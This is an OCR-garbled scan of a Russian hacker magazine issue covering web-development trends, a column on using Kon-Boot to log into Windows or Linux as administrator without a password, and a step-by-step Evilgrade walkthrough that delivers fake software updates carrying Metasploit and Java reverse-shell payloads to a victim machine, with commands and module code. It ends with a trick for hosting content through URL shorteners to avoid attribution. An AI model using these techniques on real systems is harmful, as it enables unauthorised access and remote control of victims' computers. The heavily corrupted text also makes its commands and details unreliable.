времени], а постоянно висят на связи. Воттут-то и пригодился 
новомодный ЛаѵаЗсгі рі; на стороне сервера. Благодаря ІМобеЛЗ 
подходящий сервер подчас можно написатьза вечер. При этом он 
будет держать столько постоянно открытых соединений, сколько 
позволяттебе ресурсы сервера (размер памяти и настройки ядра ОС 
и сетевого стека). 



Тренд 5. Развертываемость 
и расширяемость 

Раз уж мы вспомнили про аппаратные ресурсы, то самое время 
поговорить, пожалуй, про самый главный тренд не только в раз- 
работке, но и вообще во всей ІТ-отрасли — облачныетехнологии. То, 
насколько сіоиб-сервисы упростили жизнь при создании сложных 
проектов сложно переоценить. Простой пример — всем извест- 
ный сервис йгорбох. Разработки не стали изобретать велосипед 
с разработкой технологии для хранения данных, а использовали 
облачный сервис для хранения данных Аппагоп 53. Тут все просто. 
Сколько надо места для файлов — столько у тебя и будет. Какая будет 
нагрузка — такую сервис и выдержит. Только за каждый гигабайт 
хранилища и трафик нужно заплатить. С серверами все аналогично. 
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Документо-ориентированная система управления 
базами данных, не требующая описания схемы таблиц 



Нужен только один — пожалуйста. Нужен кластер из 1 6 сервераков 
сразу — нет проблем. Если вдруг нагрузка на приложение увели- 
чилась и нужно масштабировать систему, то это можно сделать 
буквально за несколько минут. Такую услугу, в частности, предлагает 
все та же компания Атагоп (по сути, это настоящий лидер отрас- 
ли), предоставляя технологию ЕС2. Впрочем, многим вообще не 
нужны никакие серверы — им важна готовая инфраструктура для 
развертывания своих разработок из «коробки». Хостинг платфор- 
мы (РІаіТогт аз а Зегѵісе или Раа5) — то, что сейчас набирает все 
большую и большую популярность. Это неудивительно. Добрые 
дяди за тебя уже поставили и настроили все, что может пригодиться 
для твоего приложения. Взяли несколько языков, типа РНР, РиЬу 
вместе с Ра і Із, обязательный Руібоп и выскочку ІЧобеДЗ, прицепили 
традиционную базу данных Му5СИ, а чтобы эстеты замолчали, доба- 
вили немного перчинки в виде ІМоЗОЕ — МопдоОВ, Ресііз или Ріа к. 
Поверх поставили тетсасЬесІ, а вместо анахронизма в виде РТР 
— теперь предлагают юзать распределенную системууправления 
версий ОіЕ Все это управляется через красивый веб- интерфей с, в 
котором можно просто сказать: «Хочу пять серверов тетсасЬесІ, 
два РНР и еще базу данных заверните». Тебе тут же выдают ключи 
доступа и пароли — и все, можно действовать. Команды «діі сіопе 
&& діі ризЬ» — и воттвое приложение уже вольготно себя чувствует 
на серверах, а ты даже не подозреваешь, на чем и где оно крутится. 
Помимо этого разработчикам предлагается специальный АРІ, чтобы 
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ІОиегу для мобильных устройств 



программа могла сама себе выделять ресурсы, например, добав- 
ляя еще одну базу да иных или новый и нота нс приложения. Среди 
автоматизированных сіоиб-платформ можно выделить: АррЕпдіпе, 
РНРЕод, Агиге, РаскСІоиб. 




Я не зря в предыдущем разделе упомянул Оіі Постоянно обща- 
ясь в среде разработчиков, не перестаю замечать, как РТР и 5ѴЫ 
стремительно теряют популярность. Все потихоньку переходит на 
6іС Поправил файлик, добавил немного гениального кода и хочешь 
его выкатить на хостинг? Сначала закоммить его в біі-репозиторий, 
напиши комментарий, что хорошего ты там накодил, а потом только 
разверни на сервере, причем при помощи все того же ѲіСа. И ведь 
действительно удобно: и разработка, и деплой идет при помощи 
одной системы. Все в командной строке. Посмотрев на популяр- 
ность сервиса ОііЬиЬ ( діІбиЬ.сот ). многие провайдеры, чтобы при- 
влечь разработчиков и облегчить им жизнь, стали разворачивать у 
себя біі-репозитории какединственную возможность что-то залить 
на сервер. Ну, теперь хоть не будет криков, что снова Вася нето 
залил на сервер и все перестало работать. Впрочем, используемый 




Кодинг без границ 



инструмент — это всего лишь частность. Сам подход к разработке 
кода немного поменялся. Если раньше всетвои друзья сидели уют- 
но и втихаря что-то там программировали, то теперь большинство 
перебралось на сервисы вроде ѲііНиЬ’а и занимаются «социаль- 
ным кодингом». С приходом СіСа стало намного проще следить за 
прогрессом твоих любимых библиотек. Если что-то надо срочно по- 
править в чужом коде, так без проблем: кнопка «форк»теперьтакже 
близко, как и кнопка для создания ти кета. А чтобы автор заморского 
чуда принял твои правки, не нужно долго на ломаном английском 
объяснять, что ты сделал конфетку из его непонятного кода. Просто 
отправь ему специальную заявку (пулл-реквест), и если все хорошо, 
твой код быстро попадает в основную ветку. ОііЬиЬ стал настоящим 
прорывом, потому что собрал в очень удобном веб- интерфей се все, 
что надо матерому гику-программисту. И что еще важно — он до- 
бавил острое блюдо социалыщины. 

Теперь не нужны все эти твиттеры и фейсбуки: для многих разработ- 
чиков (прежде всего Орепзоигсе) ОііЬиЬ стал местом жизни, обще- 
ния и тутже, не отходя от кассы, кодинга. А все потому, что выстраи- 
вая среду для совместной разработки кода, ѲіібиЬ не прячетлюдей 
за всеми этими коммитами и чекаутами, а активно их выталкивает 
на поверхность. Согласись, очень приятно видеть свою аватарку 
или фотку возле каждого принятого патча в важный проект. Не могу 
неупомянуть и про новые среды разработки, реализованные в 
браузере. Например, систему СІоисІ9 (с9.іо), которая изящно допол- 
няет ОііНиЬ и позволяет реально вести разработку с любого места, 
где есть интернет. 

Тренд 7. Мобильные платформы 

Последний тренд в нашем материале диктует само время. Веб- 
сервисы все чаще используются с мобильныхустройств. Порта- 
тивные девайсы методично захватывают мир, поделив его между 
«яблочниками» и «роботами». А вот дизайнерам и разработчикам 
приходится поддерживать оба лагеря. 

Ксчастью, сегодня почти все топовые 65-фреймворки имеют 
мобильные версии (часто совместимые по АРІ с обычными вариа- 
циями), что позволяет просто заменой файла подогнать сайт под 
требования мобил о к. Самым ожидаемым является ]Оиегу МоЬіІе 
(сейчас доступна только аірба-версия), который по заявлениям 
будет работать на всех мыслимых и немыслимых платформах, 
включая экзотику для нас, типа ВІаскЬеггу, ѴѴіпсіоѵѵб РЬопе, ѵѵеЬОБ, 
баба и другие. Будучи расширением, а по большому счету, очень 
крутым плагином для ] 0 и е гу, он стандартизирует АРІ для различ- 
ных устройств и их браузеров. К слову, в мобильном мире браузеры 
— это вообще один большой кошмар, так что браузерные войны 
на десктопах это только цветочки. Помимо этого разработчикам 
предлагаются строгие правила по созданию интерфейсов, чтобы 
веб-приложения имели понятный стандартизированный набор эле- 
ментов интерфейса, а пользователь не искал на своем маленьком 
экране полминуты кнопки «назад» или «отмена», □с 
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КОЛОНКА РЕДАКТОРА 

Про вход в систему без пароля 

© Не перестаю удивляться, какой в сущности бутафорией являются механизмы 
аутентификации пользователя в локальной системе. Войти в ОС с максималь- 
ными привилегиями без знания пароля? Плевое дело, когда под рукой есть 
флешка/СР с нужным софтом. 



Это касается самых разных ОС. Есть даже 
универсальный инструмент — Коп-Ьооі, 
который загружается с дискеты или СО 
и модифицирует память таким образом, 
чтобы без проблем залогиниться под 
администратором в ѴѴіпсІоѵѵз (включая 
«семерку» с сервиспаком) и под гооі’ом во 
многих Ыпих-системах. Можешь легко убе- 
диться в этом сам (естественно, на своем 
собственном компьютере и только в целях 
восстановления забытого пароля). Правда, 
на сайте разработчика по какой-то при- 
чине нет образа для записи на флешку, а 
загружаться с Сй (и, тем более, с дискеты) 
уже как-то несерьезно. Можно со знани- 
ем дела создать загрузочную флешку из 
Сй-образа (благо мы уже столько раз это 
делали для разных Ыпих-дистрибутивов), 
но с этим возникнут проблемы. Как сделать 
так, чтобы все заработало? Достаточно 
знать несколько нюансов. 

1. Сначала устанавливаем последнюю 
версию утилиты ІІІМеіЬооІіп ( ипеібооііп. 
зоигсеіогде.пеі ) — пожалуй, лучшего реше- 
ния для создания загрузочных флешек. 

2 . Далее необходимо скачать подходящую 
версию Коп-Ьооі. Кажется, что сойдет 
Сй-образ (как для многих других систем), 
но это неправильный выбор! Не наступай 
на грабли, от которых уже досталось мно- 
гим другим. Все заработает только в том 
случае, если на флешку будет загружен 
образ для дискеты. Поэтому с сайта проек- 
та ( ѵѵѵѵѵѵ.ріоІгЬап іа .сот/а 11/коп -Ьооі ) загру- 
жаем вариацию « Ріорру ітаде». 

3. В конце концов заливаем образ на 
флешку с помощью ІІІМеіЬооІіп, выбрав в 
качестве типа образа «Ріорру». 

4 . Если теперь загрузиться с этой флеш- 
ки, то ты непременно увидишь загрузчик 
ІІІМеіЬооІіп. Жми <ЕпІег>, и на экране 
появится экран с надписью «кгуріо Іодіс». 
Или не появится :). В последнем случае 
— на флешку нужно закинуть отредакти- 
рованный файл зузііпх.сбд ( ЬІІ.[у/тдК28В ). 



Это решит проблему, но несколько услож- 
нит процесс загрузки. Теперь, после 
появления первого экрана зузііпих, необ- 
ходимо будет выбрать «Ізі Коп-Вооі», а 
после второго — «2пб Ігу Ьооі [гот бгіѵе 
С: аз ЬсІІ». Если экран «кгуріо Іодіс» так 
и не появится, то выбираем следующий 
вариант — «.. 662» и т.д. В конце концов, 
все должно получиться. 

5 . После экрана «кгуріо Іодіс» начнется 
загрузка ОС, которая установлена на 
компьютере. Только в отличие от обыч- 
ной загрузки, ты сможешь беспрепят- 
ственно залогиниться в системе с макси- 
мальными привилегиями: 

• для входа в систему Ыпих используй 
логин коп-изг: 

ІІЬип1:и 8.04 ѣогресіа ^уі 

Погреба 1о§іп: коп-изг 

# ісі 

иісІ=0(гоо1:) §ісІ=0(гоо1:) 

# мЬоаті 

гооі: 

• для входа в ѴѴіпсІоѵѵз подойдет учетная 
запись любого существующего пользо- 
вателя в системе, поля пароля при этом 
можно оставить пустым. 

Проект Коп-Вооі начинался как прототип 
хака, который на лету вносил изменения 
в ядро Ыпих и позволял таким образом 
зайти в систему под гооі’ом. Сначала 
появилась версия для ІІЬипІи, а после 
вышли плагины для многих других Ыпих- 
дистрибутивов. С недавнего времени 
Коп-Вооі поддерживает еще и большин- 
ство ѴѴіпбоѵѵз-систем. Примечательно, 
что проект написан на чистом ассембле- 
ре (ТА5М 4.0) и работает только на архи- 
тектуре Х86-32. Дальнейшее развитие 
Коп-Вооі разработчик видит в виде ком- 
мерческого продукта, который уже досту- 
пен с сайта ѵѵѵѵѵѵ.кгѵріозіодіс.сот и стоит 
денег, но зато имеет несколько полезных 




НРІІІ ІН 41 






"і Г=-| 



Заливаем на флешку образ Коп- 
Вооі’ 




Загрузчик Коп-Вооі в действии 




Входим в систему под админом без 
пароля 

доработок, в том числе возможность 
использования с любыми 32/64-битными 
ѴѴіпбоѵѵз-системами. т 
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Опасные обновления 

Заражение системы через механизм 
автоапдеитов 



о Любое современное приложение периодически запрашивает на 
сервере информацию о новых обновлениях. Это очень удобно: один 
клик мыши - и в системе уже установлен самый последний релиз 
программы. Но! Обрадовавшись появлению обновленной версии и 
согласившись на установку апдейта, пользователь может получить 
не свежие багфиксы и новые функции, а боевую нагрузку. 



Вспомни, какобычно выглядит система автоматического обнов- 
ления какого-то привычного приложения. Программа в какой-то 
момент выдает сообщение вида: «Доступна новая версия. Пожа- 
луйста, обновитесь», и мы чаще всего сразу же даем отмашку на 
установку свежего апдейта. 

Но задумывался литы, что там скачиваетЗкуре или Чаѵа? Едва ли. 
Запуская процесс обновления, последнее, чего можно ожидать, 

— это какой-либо подставы. Как не парадоксально, но этот самый 
механизм доставки обновлений может стать уязвимым местом всей 
системы. Причем речь идет не о каких-то левых поделках горе- 
программистов, а о серьезных продуктах с миллионной армией 
пользователей. 



Где изъян? 

Атаки через системы обновлений приложений известны давно. Все 
дело втом, что разработчики не сильно утруждают себя задуматься о 
безопасности механизма доставки обновлений. Чаще всего процесс 
автоматического апдейта вы глядит следующим небезопасным образом: 

• приложение инициирует процесс обновления (автоматически или 
по команде пользователя); 

• через О N8 запрашивается хоста с обновлениями (например, 
ирсіаіе.аррі .сопл); 

• ОЫЗ-сервер возвращает адрес сервера (например, 192.1 68. 1.1); 

• приложение загружаете сервера специальный файл с информа- 
цией об апдейтах (например, Іазіирсіаіе.хппі), анализирует его и 
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Настройка модуля $ип|аѵа 



Загрузка Еѵіідгасіе 



определяет, что доступна новая версия; 

• в конце концов, приложение скачивает файл 
Ыір://ирсІаІе.арр1 .сот/и рбаіе.ехе и выполняет его. 

Вот и все. Ни каких тебе проверок подлинности серве- 
ра обновлений, сверки цифровой подписи скачанного 
файла и другихэлементарных действий, которые могли 
бы обезопасить процессобновления. Слепоедоверие — 
по-другому не назовешь. Получается, что ничто не мешает 
злоумышленнику притвориться сервером обновлений и 
отправить приложению файл, который оно запустит. Полу- 
чаем классическую МІТМ-атаку, позволяющую инжекти- 
ровать нагрузку через систему обновлений, которая реали- 
зуется с помощью АРР-спуфинга либо путем «отравления» 
0І\І5-кэша. Если ты думаешь, что это проблема лишь 
отдельных приложений, то сильно ошибаешься. Иссле- 
дователь Франциско Амато из команды ІпІоЬуІеЗесигіІу 
РезеагсИ ( ѵѵѵѵѵѵ.іпІоЬѵІезес.сот/беѵеІортепІз.бІппІ ) 
разработал на Регі модульный фреймворкспециальнодля 
реализации эта к через систему апдейтов. Инструмент на- 
зывается Еѵіідгасіе и включает в себя готовые модули для 
эксплуатации нехилого списка известных приложений: 



Еѵіідгасіе + Ме+азріоіі 



Во время конфигурации модулей Еѵіідгасіе важным шагом является уста- 
новка параметра адепі, с помощью которого определяется полезная нагруз- 
ка (рауіоасі). По сути, это тот файл или команда, которые будут отправлены 
клиенту под видом обновления. Однако, попробовав поменять значение 
адепі, ты обнаружишь, что в Еѵіідгасіе не так уж много доступных агентов 
(они, кстати, находятся в папке адепі). Спешу тебя успокоить, разработчики 
Еѵіідгасіе продумали этот момент и добавили возможность использования 
различных рауіоасі’ов из Меіазріоіі. На практике это выглядит так: 

> зеі: а§еп1: ' ["/те’ІаБрІоі’І/піБ-ррауІоасІ ыіпсІоы5/5Ііе11_геѵег5е_1;ср 

І_Н05Т=192 . 168 .1.2 1_Р0КТ=4141 X > <%ОІЛ%>/*тр/а . ехе<%ОІЛ%>" ] ' 

Если задать агент данным образом, то при каждом запросе файла обновле- 
ния будет генерироваться бинарник с полезной нагрузкой ѵѵіпбоѵѵз/зИеК 
геѵегзе_1ср, который будет пытаться подключиться к 4141 порту компьютера 
192.168.1.2. Специальный тег <%01ІТ%> указывает, куда будет помещен 
сгенерированный файл (в данном примере это папка /ітр, а имя файла 
будет а.ехе). То же самое, в принципе, можно проделать и другим способом: 
зайти в Меіазріоіі, сгенерировать файл, переместить его в какую либо папку 
и установить этот файл в качестве агента в Еѵіідгасіе. Но в этом случае это 
будет уже не динамический метод. 



• Театѵіеыег 5.1.9385; 

• І\Іо1:ерасІ++ 5.8.2; 

• Заѵа 1.6.Ѳ_22 міпхр/міп7; 

• Арр1еирсІа1:е <= 2.1.1.116 ( БаТагі 5.0.2 
7533.18. 5, <= Ишпез 10.0.1.22, <= (2иіск1:іте 7.6.8 

1675); 

• ЫІПСІОЫ5 ирсІаТе (іеб 1аз1:ѵег5Іоп, іе7 
7.0.5730.13, іе8 8.0.60001.18702, Місгобо-Р* могкз); 

• Ілііпатр 5.581; 

• ѴігІиаІВох (3.2.8 ); 

• Рііеііііа; 

• Ріазіі^еі:; 

• Мігапсіа; 

• Бкуре; 

• Тгііііап <= 5.0.0.26; 

• Асііигп 1.3.10 (Брагкіе Ргатеыогк) ; 

• ѴМмаге; 
и т.д. 



облегчают проведение атаки. Последняя версия была 
представлена относительно недавно на конференциях 
Віаскбаі Агзепаі & Оеісоп 2010. 

Азы Еѵіідгасіе 

Поскольку фреймворк написан на Регі, то запустить его 
можно на любой платформе. Я юзал его под виндой, и 
для правильной работы с Асііѵе Регі [ ѵѵѵѵѵѵ.асІіѵе5ІаІе. 
сот/асііѵерегі ) мне потребовалосьустановить два 
пакета: І0::5оскеІ::55І_ и І\ІеІ::55І_еау. В стандартных 
репозиториях их не оказалось, поэтому я установил их с 
помощью пакетного менеджера ррт с альтернативных 
источников. Делает это так: 

ррт Іп5і:а11 ІгЫр : //ѵіѵіѵі. БІзурІіиБІоп .1:к/ррт/І\Іе1:- 
55І_еау.ррсІ 

ррт Іп5і:а11 ІгС'Ср : //ѵіѵіѵі. БІБурІіиБІоп .1:к/ррт/ІО- 
5оске1:-55І_.ррсІ 




> ѵѵагпіпд 

Информация пред- 
ставлена в ознако- 
мительных целях. За 
ее использование с 
нарушением закона 
автор и редакция от- 
ветственности не 
несут. 



Каждый модуль отвечает за эмуляцию обновления кон- 
кретного приложения. Помимо этого в Еѵіідгасіе входят 
модули, реализующие ѴѴеЬ- и 0І\І5-серверы, которые 



После этого Еѵіідгасіе будет запускаться и работать без 
сучка и задоринки. Если ты уже использовал Меіазріоіі, 
то долго разбираться с Еѵіідгасіе не потребуется: син- 
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Процесс общения приложения с сервером обновлений 

таксис команд во многом очень похож, а взаимодействие осущест- 
вляется также через интерактивную консоль. Можно запустить при- 
ложение и набрать Ьеір, чтобы получить список доступных команд: 

сопй§иге <имя модуля> - выбирает текущий модуль и позволяет 
настроить его параметры; 

геіоасі - перезагружает список доступных модулей; 

гезѣаМ: - перезапускает ІдІеЬ- и йМБ-серверы; 

зеі: - устанавливает значение заданной переменной; 

зііом - показывает информацию об объекте. Список доступных 

объектов: 

орѣіопз - псписок опций текущего модуля; 
ѵИозІз - псписок виртуальных хостов текущего модуля; 
тосіиіез - псписок всех доступных модулей; 
асѣіѵе - пактивные модули; 
зѣагі: - пзапускает МеЬ- и 0М5-серверы; 
зѣаѣиз - потображает статус ІлІеЬ-сервера; 
зѣор - постанавливает ІлІеЬ- и 0М5-серверы; 

Понимаю, что от этого списка понятнее ничего не становится. Не 
волнуйся. Дальше по ходу примера все станетясно. Какя уже сказал, 
среди продуктов, подверженных данному виду атак, есть достаточно 
популярные решения. Возьмем, например, Заѵа, которая требует- 
ся для работы многих программ и довольно часто встречается на 
компьютерах пользователей, и попытаемся с ее помощью получить 
доступ кудаленному хосту. Думаю, это будетхороший пример. 

Тестовая лаборатория 

Итак, у нас есть два компьютера: один из них, с установленной 
Заѵа, выступает в роли жертвы, другой (с Еѵіідгабе) — в роли 
атакующего. Какты помнишь, для успешного проведения атаки 
необходимо, чтобы при обращении к серверу обновлений, прило- 
жение «попадало» на компьютер атакующего, что обычно делается 
при помощи АР Р-зрообпд’а или й N5 Сасбе Роізоп. Мы немного 
упростим себе задачу (чтобы в десятый раз не писать об одном и 
том же) и просто отредактируем файл Ьозіз на машине жертвы, 
указав в нем в качестве адреса сервера обновлений адрес нашей 
атакующей машины: 

192.168.1.2 даѵа.зип.сот 

192.168.1.2 даѵасіі-езсі . зип . сот 

Теперь в ход идет Еѵіідгабе. Запускаем его: 

регі еѵіі^гасіе 

Чтобы посмотреть список доступных модулей, вводим «5боѵѵ 
ппобиіез». Список достаточно внушительный, есть из чего выбрать, 
но нам нужен модуль зищаѵа. Далее, чтобы сконфигурировать его, 
вызываем соответствующую команду: 

> соітР зипдаѵа 

► озб 



Посмотрим, какие параметры мы можем поменять: 

> 5 б ОМ ОрІІІОПЗ 

После чего получаем следующую таблицу: 

Мате = 5іт Місгозузіетз Іаѵа 
Ѵегзіоп = 1.0 

Аиііпог = ["Ргапсізсо Атаіо < Татаіо +[АТ]+ іпТоЬуіезес . сот>" ] 
йезсгіріііоп = " " 

ѴігіиаІНозІ: = " (даѵа . зип . сот | даѵасіі-езсі . зип . сот) " 



| Мате 


| Ое-Раиіі: 


| меЬзііе 


| біір://даѵа.сот/тогеіп-Ро1іпк 


| епаЫе 


1 1 


| аііііе 


| Сгііісаі ѵиІпегаЬіІііу 


1 аг§ 


| біір ://даѵа. зип. сот/х. дпір" 


| асіезс 


| Тбіз сгііісаі ирсіаіе бх іпіегпаі ѵиІпегаЬіІііу 


| сіезсг 


| Тбіз сгііісаі ирсіаіе бх іпіегпаі ѵиІпегаЬіІііу 


| а§епі 


| ./іпсІисІе/зипдаѵа/ІаѵаРауІоасІ/РиппуСІаззг.даг 


| ііііе 


| Сгііісаі ирсіаіе 

+ 



Наиболее интересное для нас поле — это адепі, представляющее из 
себя аналог полезной нагрузки (рауіоасі) в МеІазрІоіТ Проще говоря, 
тут мы указываем файл, который будет отправлен жертве в качестве 
обновления. В данном случае — это ЕиппуС1азз2даг. Это геѵегзезЬеІІ, 
который инициирует соединение с 2010 портом атакующей машины. 
Поэтому перед его использованием надо запустить приложение, кото- 
рое будет ожидать попыток соединения на 201 0 порт. Для этого зайдем 
в папку іпсІибе\зипіаѵаѴіаѵаРауІоасІ\и выполним команду: 

даѵа -ср "ІІаѵаРауІоасІ. даг:НЬ/*" даѵарауіоасі . МапсІІег . 

зіа^ег .Біа^егНапсІІег Кеѵегзе55І_ 192.168.1.2 2010 -- 156 

Теперь можно вернуться к конфигурации модуля. Обрати внимание 
на поля абНе и абезсгірііоп. Тутзадается сообщение, которое будет 
появляться в трее, как только Оаѵа соединится с нашим сервером 
и найдет свежие обновления, и после — в процессе выполнения 
обновления. Все параметры данного модуля можно изменить, 
используя команду зеТ Заменим, к примеру, заголовок информаци- 
онного окна: 

> зеі: аііііе "Меы ѵегзіоп аѵаіІаЬІе" 

Подобным образом можно менять и остальные параметры. Если 
теперь еще раз ввести команду «збоѵѵорііопз», то мы увидим из- 
менения в настройках модуля. По сути, сейчасуже можно смело 
запускать все необходимое для проведения атаки. Делается это 
командой зІагТ 
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■ Бк 



Вручную запрашиваем обновления и получаем 
информацию о наличии «нашего» критического 
апдейта 




Подменяем адреса серверов обновлений 



Эксплуатация 

Теперь проверим, какэто все работает. Чтобы инициировать про- 
цесс обновления на компьютере жертвы, заходим в панель управ- 
ления, запускаем Чаѵа, и в появившемся окне выбираем вкладку 
«Іірбаіе», нажимаем кнопку «Іірбаіе Ыоѵѵ». Весь процесс «обще- 
ния» приложения с сервером обновлений будет отображаться в 
окне Еѵіідгасіе. Посмотретьтекущее состояние можно с помощью 
команды «збоѵѵзіаіиз»: 



сІіепТ = 192.168.1.1 
тосіиіе = тосіиіез: ізипдаѵа 
зТаТиБ = бѳпсі 

(тсІБ., стсЧбІе) = сІ9а28Ьаа883ес-Р51е41-Рс626е1сІ4еесІ5/Ч 
". іпс1исІе/5ипдаѵа/1аѵаРау1оасІ/РиппуС1а552. даг" 

Он указывает, что поддельное обновление было успешно отправле- 
но на машину с адресом 192.1 68.1 .1 . Теперь, открыв вторую консоль, 
ожидавшую подключения, убедимся, что боевая нагрузка успешно 
была выполнена — и мы имеем геѵегзе збеіі кудаленному компью- 
теру. Можно ввести команду Ьеір и увидеть список команд, доступ- 
ных к выполнению на удаленной системе. 

Детские болезни 

Как видишь, даже серьезные приложения могут быть большой 
проблемой для безопасности компьютера. И пусть в них нет пере- 
полнений буфера или прочих ошибок, но неправильно реализо- 
ванный механизм обновлений превращает их в этакий «черный 



Структура модуля Еѵіідгасіе 



Надо понимать, что Еѵіідгасіе — это все-таки фреймворк для 
реализации атаки через обновления. Встроенные модули для 
популярных приложений являются примерами того, как его 
можно использовать. И их не так уж и много. Хочу рассказать 
немного об их структуре, чтобы ты имел представление, как 
такой модуль можно собрать самому. Поскольку сам Еѵіідгасіе 
написан на РегГе, то любой модуль, по сути, представляет собой 
обычный Регі-скрипт, в котором МЫ: 

1. Задаем имя модуля и подключаем необходимые пакеты: 

раскате тосіиіез: :зипдаѵа; 
изе бТгісТ; 

изе Оаіа: :йитр дм(сіитр); 

2. Определяем переменную $Ьазе, включающую в себя все дан- 
ные о работе модуля: 

• имя модуля для отображения во фреймворке, версию модуля, 
версию уязвимого приложения, информацию об авторе моду- 
ля, краткое описание и список виртуальных хостов, с которых 
приложение пытается получить информацию об обновлении и 
файлы обновлений: 

'пате' => 'Бип Місгозузігетз Іаѵа', 

’ѵегзіоп' => '2.0' , 

'аррѵеп' => '<= 1.6. Ѳ_22 ' у 

'аиіііог' => [ ^ате Бигпате < таіі +[АТ]+ таі1.сот>' ], 

' сіезсгіріііоп ' => яя{ } „ 

' ѵЬ ' => ' (даѵа.зип.сот| даѵасіі-езсі.зип.сот) ' , 

• список запросов, которые будет посылать приложение нашему 
серверу обновлений с использованием регулярных выражений: 

'гед' => ' ( /ирсіаісе/ [ . \сІ ] +/тар\ - [ . \сІ ] + . хті | / 
иргіа1е/1.6.0/тар\-т\-1.6.0.хт1) ' , 

• список опций, которые будут использоваться в ответах нашего 
сервера обновлений: 

'ор-ііопз' => 

{ 'а§еп1:' => { 'ѵаі' => ' . /а§еп1:/даѵа/даѵаы5 . ехе ' ^ 

'сіезс' => 'А§еп1: 1:о іпдесі: ' }, 

'аг§' => { 'ѵаі' => ' Ы:1:р://даѵа. зип. сот/х. дпір', 

'сіезс' => 'Аг§ раззесі Іо А§еп1: ' 

’епаЫе' => { 'ѵаі' => 1, 'сіезс' => 'Біаіиз ' 

Полностью разобранный файл модуля с комментариями на рус- 
ском языке ты можешь найти на ОѴО-приложении. 



ход», которым кто-то может воспользоваться. Многие разработ- 
чики успели исправить некоторые детские болезни, немного обе- 
зопасив процесс обновления. 

Увы, далеко не всегда это дает нужный эффект. Если поковы- 
ряться в исходниках модулей (о том, как они устроены, читай во 
врезке], которые идут вместе с Еѵіідгасіе, несложно найти места, 
где происходит обход примитивных проверок. Но каким должно 
быть безопасное обновление? Автор Еѵіідгасіе говорит о том, что 
сервер обновлений должен работать под Ыірз и поддерживать 
сертификаты, а само обновление должно обязательно содержать 
цифровую подпись, которую можно проверить по публичному 
ключу. 

Вроде бы все просто, но проблема по-прежнему есть, т 
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РРООР-ОР-СОЯСЕРТ 

РгооЬоІ-СопсерІ (РОС) - наша новая рубрика, в которой 
мы будем рассказывать об интересных концептах, вы- 
ковыренных нами в самых разныхуголках интернета. 
Если и тебе встретится что-нибудь интересное - смело 
присылай нам это по адресу юс(5)геа1.хакер.ги . 





НТТР://ѴѴѴШ 



1 Г 

> Ііпкз 

Соответствующий 
поставтора идеи со 
всеми необходимыми 
ссылками: 
таіауа-гетіуа. 
Ііѵе]ои гпа I. 
сот/639054.ЫтІ 



Прекрасную и очень оригинальную идею бесплатного 
анонимного хостинга предложил недавно автор блога 
таіаѵа-гетіуа.ііѵеригпаі.сот . Суть идеи очень проста 
— запихнуть весь контент странички в ІІРІ_, а затем 
сократить с помощью любого сервиса сокращения 
ІіРСов вроде ЬІСІѵ . доо.аі или Ііпѵигі.сот . Потребуется 
только разместить где-то элементарный скриптик, 
который будет из урла брать контент и выводить на 
экран. Хранить он при этом его не будет. Хранить весь 
контент будет сокращалка. В общем, красота. 

Давай поподробнее разберемся, как это работает. 
Итак, есть ссылка, например, 1:іпѵиг[.сопп/Зпдби2[ . При 
переходе по ней — нас переправит на длиннющую 
ссылку вроде следующей: 

б1:1:р://хостинг/яваскрптик. б1:т1#РСб1УІлІ(2-і-Сдх2СІНІ5 

24КУт9ке5В7СіА§У295ЬЗІ6ІСМ6КдУ7СіА§УтРда2сІуЬЗѴи2 




Пример страницы, сохраненной на Ііпіиіі 



С1зЬ2хѵсзо§І2АыМО5К-рро813М0еІлІх1Р§о812Іі1УІлір+СзхіЬ 

2К5Р§рІІаСІ2ІНВІі221І§аХМ§аС92СІСѴкІС9иІ0хІіІСІіу2ІлІУ9І 

тб0гіНА61у90аМ55гіХ35І_тІ\ІѵЬ5І+сІС1иеХѴуЬС5зЬ208І_2Е+С 

дмѵУт9кеТ4= 

В ней все после знака '#' — это наш контент в Ьазе64- 
формате, а яваскриптик — это скрипт, делающий вот 
так: 

ѵаг Іі5Іі = сіосишепі: .1оса1:іоп . Ііавіі; 

Іі5Іі = Іі5Іі . 5иЬ5І:гіп§(1, МбМ .1еп§1:1і); 
сІоситеп1:.ыгі1:е(сІесосІе64(Іі5Іі )); 

// сІесосІеб4 - функция, декодирующая Ьазе64 

То есть он просто получит все, что после , #' р раскодиру- 
ет и выведет на экран. 

В ПРО длина ІІВІ_ никак не регламентирована, поэтому 
можно смело кодировать с помощью любого Ьазе64- 
алгоритма Ыті-код любой длины, надеясь, что браузе- 
ры тоже никак не ограничивают длину урла. Чтобы раз- 
местить таким образом картинки, нужно будет немного 
потрахаться с баіа. Вот так, например: 

<іт§ 5гс="сІа1:а : іта§е/§іТ; Ьаве64, К0іе(Ю1ІіЕААОАІ_ 

МААОа2ТоеНб01:15/712ѵ/0дѵЬ291:/-РЗ//иЬ//§е8ІлІ51-Р/ 

гбТ/ЗЫЬЫ1тх5ЬР//т-Р///уН5ВАААААААІ_АААААА(2АА4ААА 

Ке811Екуку67р21бІпдМ5ШсІе0ЕСмІЗоЕхКсррѴ0аСсеСтТ 

1НЕШЕдд§аОКСМх1С6е0Сс§и1л(ы6аРд5\/Мкк1п7§772КРЗдР 

2д1уб75 3А§УСоЕСу2х5Вхд1\1§УРд/§АмХЕ(2А7" ыісИ: М= " 16 " 

Ііеі§Іі1:= ,, 14 ,, /> 

Синтаксис тут простой (данные, понятно, в пресловутом 
Ьазе64): 

сіаѣа: [<тип данных>] [;Ьазе64] ,<данные> 

Как применять такую занятную идею, мы предлагаем 
тебе придумать самостоятельно, но, уверены, у всех 
случается необходимость что-то опубликовать, но... 
не у себя. Чтобы не прицепились, а то всякое бывает 



► 038 
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ЕОІРІЕП 5730 





ѵѵѵѵѵѵ.еаігіег.ги 


ЕсііТіеі 


мощь 


ТЕХНОЛОГИИ 
..... КАЧЕСТВО 


АКУСТИЧЕСКИЕ СИСТЕМЫ 



ТЕХНОЛОГИИ 

52000 



ДИЗАЙН 

ІР500 



МОЩЬ 

5730 



КОМПАКТНОСТЬ 

МРЗООРШ5 





ИЯ 



взлом 



■ ■ Алексей «бгеепйод» Тюрин (адггггіодгадтаіі.сот) 





ЗАДАЧА: ПРОСМОТРЕТЬ 
ЗАПУЩЕННЫЕ ПРОЦЕССЫ В 
МНОГОПОЛЬЗОВАТЕЛЬСКОЙ СИСТЕМЕ. 



РЕШЕНИЕ: 

Такая задача может возникнуть, например, когда мы — обычный 
пользователь со стандартными правами натерминальном виндовом 
серваке и нам интересно, «чем заняты другие». Диспетчер задач (то, что 
запускается <сМ+а11+сІеІ>] отображаеттолько процессы пользователя 
